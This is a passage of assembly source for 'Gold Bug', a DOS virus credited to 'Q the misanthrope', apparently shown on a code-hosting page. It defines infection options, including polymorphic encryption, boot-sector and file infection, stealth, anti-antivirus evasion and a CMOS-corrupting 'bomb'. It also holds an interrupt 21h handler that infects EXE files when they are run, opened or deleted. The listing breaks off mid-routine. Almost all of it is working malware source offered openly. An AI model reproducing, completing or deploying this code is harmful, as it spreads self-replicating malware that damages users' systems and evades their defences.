📄 gold-bug.asm
字号:
cseg segment para public 'code'
gold_bug proc near
assume cs:cseg
;-----------------------------------------------------------------------------
;designed by "Q" the misanthrope.
;-----------------------------------------------------------------------------
.186
TRUE equ 001h
FALSE equ 000h
;-----------------------------------------------------------------------------
;option bytes used and where
DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code
CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code
INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code
CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code
DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code
READING_STEALTH equ TRUE ; 5 bytes 5 in com_code
SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code
DOUBLE_DECRYPT equ TRUE ; 26 bytes 26 in com_code
EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code
MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code
ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code
POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code
MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code
;-----------------------------------------------------------------------------
;floppy boot infection
FLOPPY_1_2M equ 001h
FLOPPY_760K equ 000h
FLOPPY_TYPE equ FLOPPY_1_2M
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
DELETE_SCANNERS equ FALSE
CHECK_FOR_8088 equ FALSE
INFECT_RANDOM equ FALSE
DEFLECT_DELETE equ FALSE
READING_STEALTH equ FALSE
SAME_FILE_DATE equ FALSE
EXECUTE_SPAWNED equ FALSE
POLYMORPHIC equ FALSE
ENDIF
;-----------------------------------------------------------------------------
SECTOR_SIZE equ 00200h
RES_OFFSET equ 0fb00h
COM_OFFSET equ 00100h
RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET
PART_OFFSET equ COM_OFFSET+SECTOR_SIZE
BOOT_OFFSET equ 07c00h
RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET
LOW_JMP_10 equ 0031ch
LOW_JMP_21 equ 00321h
SAVE_INT_CHAIN equ 0032ch
SCRATCH_AREA equ 08000h
HEADER_SEGMENT equ 00034h
INT_21_IS_NOW equ 0cch
BIOS_INT_13 equ 0c6h
NEW_INT_13_LOOP equ 0cdh
BOOT_SECTOR equ 001h
DESCRIPTOR_OFF equ 015h
IF FLOPPY_TYPE EQ FLOPPY_1_2M
DESCRIPTOR equ 0f909h
OLD_BOOT_SECTOR equ 00eh
COM_CODE_SECTOR equ 00dh
ELSE
DESCRIPTOR equ 0f905h
OLD_BOOT_SECTOR equ 005h
COM_CODE_SECTOR equ 004h
ENDIF
READ_ONLY equ 001h
SYSTEM equ 004h
DELTA_RI equ 004h
DSR equ 020h
CTS equ 010h
CD equ 080h
FAR_JUMP equ 0eah
MIN_FILE_SIZE equ 00500h
PSP_SIZE equ 00100h
VIRGIN_INT_13_A equ 00806h
VIRGIN_INT_13_B equ 007b4h
VIRGIN_INT_2F equ 00706h
FAR_JUMP_OFFSET equ 006h
SET_INT_OFFSET equ 007h
CHANGE_SEG_OFF equ 009h
VIDEO_MODE equ 00449h
MONOCHROME equ 007h
COLOR_VIDEO_MEM equ 0b000h
ADDR_MUL equ 004h
SINGLE_BYTE_INT equ 003h
VIDEO_INT equ 010h
VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL
DISK_INT equ 013h
DISK_INT_ADDR equ DISK_INT*ADDR_MUL
SERIAL_INT equ 014h
DOS_INT equ 021h
DOS_INT_ADDR equ DOS_INT*ADDR_MUL
MULTIPLEX_INT equ 02fh
COMMAND_LINE equ 080h
FIRST_FCB equ 05ch
SECOND_FCB equ 06ch
NULL equ 00000h
GET_PORT_STATUS equ 00300h
WRITE_TO_PORT equ 00100h
HD_0_HEAD_0 equ 00080h
READ_A_SECTOR equ 00201h
WRITE_A_SECTOR equ 00301h
GET equ 000h
SET equ 001h
DELETE_W_FCB equ 01300h
DEFAULT_DRIVE equ 000h
GET_DEFAULT_DR equ 01900h
DOS_SET_INT equ 02500h
FILE_DATE_TIME equ 05700h
DENYNONE equ 040h
OPEN_W_HANDLE equ 03d00h
READ_W_HANDLE equ 03f00h
WRITE_W_HANDLE equ 04000h
CLOSE_HANDLE equ 03e00h
UNLINK equ 04100h
FILE_ATTRIBUTES equ 04300h
RESIZE_MEMORY equ 04a00h
QUERY_FREE_HMA equ 04a01h
ALLOCATE_HMA equ 04a02h
EXEC_PROGRAM equ 04b00h
GET_ERROR_LEVEL equ 04d00h
TERMINATE_W_ERR equ 04c00h
RENAME_A_FILE equ 05600h
LSEEK_TO_END equ 04202h
CREATE_NEW_FILE equ 05b00h
RESIDENT_LENGTH equ 068h
PARAMETER_TABLE equ 005f1h
MAX_PATH_LENGTH equ 00080h
EXE_HEADER_SIZE equ 020h
NEW_EXE_HEADER equ 00040h
NEW_EXE_OFFSET equ 018h
PKLITE_SIGN equ 'KP'
PKLITE_OFFSET equ 01eh
NO_OF_COM_PORTS equ 004h
WINDOWS_BEGIN equ 01605h
WINDOWS_END equ 01606h
ERROR_IN_EXE equ 0000bh
IF POLYMORPHIC
FILE_SIGNATURE equ 07081h
XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES
FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES
FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE)
SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code))
BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code))
ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code))
ELSE
FILE_SIGNATURE equ 0070eh
ENDIF
IF MODEM_CODE
STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string))
ENDIF
IF EXECUTE_SPAWNED
EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table))
ENDIF
DH_OFFSET equ byte ptr ((offset dh_value)-(offset initialize_boot)+TWO_BYTES)
ONE_NIBBLE equ 004h
ONE_BYTE equ 001h
TWO_BYTES equ 002h
THREE_BYTES equ 003h
FOUR_BYTES equ 004h
FIVE_BYTES equ 005h
FIVE_BITS equ 005h
EIGHT_BYTES equ 008h
USING_HARD_DISK equ 080h
KEEP_CF_INTACT equ 002h
CMOS_CRC_ERROR equ 02eh
CMOS_PORT equ 070h
REMOVE_NOP equ 001h
CR equ 00dh
LF equ 00ah
INT3_INCBX equ 043cch
INC_BL equ 0c3feh
INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL
JMP_NO_SIGN equ 079h
JMP_NOT_ZERO equ 075h
JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO
CLI_PUSHCS equ 00efah
;-----------------------------------------------------------------------------
video_seg segment at 0c000h
org 00000h
original_int_10 label word
video_seg ends
;-----------------------------------------------------------------------------
io_seg segment at 00070h
org 00893h
original_2f_jmp label word
io_seg ends
;-----------------------------------------------------------------------------
org COM_OFFSET
com_code:
;-----------------------------------------------------------------------------
IF POLYMORPHIC
first_decode proc near
serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE
org $-REMOVE_NOP
org $-FIVE_BYTES
jmp load_it
org $+TWO_BYTES
rotated_code: int SINGLE_BYTE_INT
into
adc al,0d4h
incbl_incbx: inc bl
first_jmp: jnz serial_number
add bx,si
jns serial_number
first_decode endp
;-----------------------------------------------------------------------------
IF DOUBLE_DECRYPT
second_decode proc near
push si
get_next_byte: lodsw
add bx,ax
inc bx
xor byte ptr ds:[si+SECOND_UNDO_OFF],bl
org $-REMOVE_NOP
dec si
second_jmp: jns get_next_byte
pop si
second_decode endp
ENDIF
ENDIF
;-----------------------------------------------------------------------------
com_start proc near
IF MULTIPARTITE
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_int
mov di,VIRGIN_INT_13_B
call set_both_ints
push cs
pop es
ENDIF
dont_set_int: IF CHECK_FOR_8088
mov cl,RESIDENT_LENGTH
mov al,high(RESIZE_MEMORY)
shl ax,cl
mov bx,cx
int DOS_INT
ELSEIF MULTIPARTITE
mov bx,RESIDENT_LENGTH
mov ah,high(RESIZE_MEMORY)
int DOS_INT
ENDIF
IF EXECUTE_SPAWNED
pusha
call from_com_code+RELATIVE_OFFSET
popa
push cs
pop ds
push cs
pop es
cmpsw
mov dx,si
sub si,EXEC_SUBTRACT
org $-REMOVE_NOP
mov bx,PARAMETER_TABLE
mov di,bx
mov ax,EXEC_PROGRAM
set_table: scasw
movsb
scasb
mov word ptr ds:[di],ds
je set_table
int DOS_INT
mov ah,high(GET_ERROR_LEVEL)
int DOS_INT
mov ah,high(TERMINATE_W_ERR)
ELSEIF MULTIPARTITE
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
ENDIF
IF MULTIPARTITE
int DOS_INT
ELSE
jmp boot_load
ENDIF
com_start endp
;-----------------------------------------------------------------------------
interrupt_21 proc far
pushf
pusha
push ds
push es
mov di,dx
push ds
pop es
cld
mov cx,MAX_PATH_LENGTH
IF MULTIPARTITE
mov si,offset file_name+RELATIVE_OFFSET
ENDIF
IF READING_STEALTH OR DEFLECT_DELETE
mov bx,ax
ENDIF
cmp ax,EXEC_PROGRAM
IF READING_STEALTH
je start_process
cmp ah,high(OPEN_W_HANDLE)
ENDIF
IF DEFLECT_DELETE
je start_process
cmp ah,high(UNLINK)
ENDIF
jne a_return
start_process: xor ax,ax
copy_name: IF MULTIPARTITE
mov bl,byte ptr ds:[di]
mov byte ptr cs:[si],bl
inc si
ENDIF
scasb
loopne copy_name
std
scasw
IF MULTIPARTITE
mov byte ptr cs:[si-FIVE_BYTES],al
ENDIF
mov al,'E'
scasw
jne a_return
mov ah,'X'
scasw
jne a_return
IF MULTIPARTITE
push ds
ENDIF
pusha
call open_close_file
IF SAME_FILE_DATE
mov word ptr cs:[new_time+ONE_BYTE+RELATIVE_OFFSET],cx
mov word ptr cs:[new_date+ONE_BYTE+RELATIVE_OFFSET],dx
ENDIF
or si,si
IF MULTIPARTITE
jnz large_exe_file
cmp word ptr ds:[si],FILE_SIGNATURE
je our_kind
IF INFECT_RANDOM
xor di,bp
jpo our_kind
ENDIF
cmp word ptr ds:[si+NEW_EXE_OFFSET],NEW_EXE_HEADER
jb test_if_open
cmp word ptr ds:[si+PKLITE_OFFSET],PKLITE_SIGN
je test_if_open
ELSE
jz our_kind
ENDIF
large_exe_file: popa
IF MULTIPARTITE
pop ds
ENDIF
IF ANTI_ANTIVIRUS
mov al,'N'
scasb
ja a_return
mov al,'A'
scasb
jne a_return
pop es
pop ds
popa
IF READING_STEALTH OR DEFLECT_DELETE
cmp ah,high(EXEC_PROGRAM)
jne opened_file
ENDIF
popf
IF CMOS_BOMB
mov al,CMOS_CRC_ERROR
out CMOS_PORT,ax
ENDIF
IF DELETE_SCANNERS
mov ah,high(UNLINK)
jmp short old_int_10_21
ELSE
mov al,ERROR_IN_EXE
stc
retf KEEP_CF_INTACT
ENDIF
ELSE
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -